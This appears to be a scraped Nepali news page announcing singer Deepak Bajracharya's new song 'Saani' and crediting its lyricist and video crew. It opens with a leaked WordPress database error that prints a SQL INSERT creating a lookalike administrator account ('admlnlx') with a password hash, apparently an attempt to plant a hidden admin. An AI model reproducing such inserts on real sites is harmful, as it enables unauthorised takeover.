WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYtBpRvfBANyBDkvV83uySl5YPBWQi/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-16 08:28:50', '', 'admlnlx', 'admlnlx')
चितवन, फागुन ५–
गायक दीपक बज्राचार्यको नयाँ गीत बजारमा आएको छ । ‘सानी’ बोलको नयाँ गीत अहिले चर्चा कमाउन थालेको छ । रिक्की शाक्यको शब्द रहेको यस गीतमा स्वंम गायक बज्राचार्यको संगीत रहेको छ । यस गीतको भिडियोमा पूजा, जोर्डन, कमल र अञ्जुलाई देख्न सकिन्छ । निकेश खड्काले निर्देशन गरेको भिडियोलाई अर्जुन तिवारीले खिचेका हुन् भने निशान घिमिरेले सम्पादन गरेका हुन् ।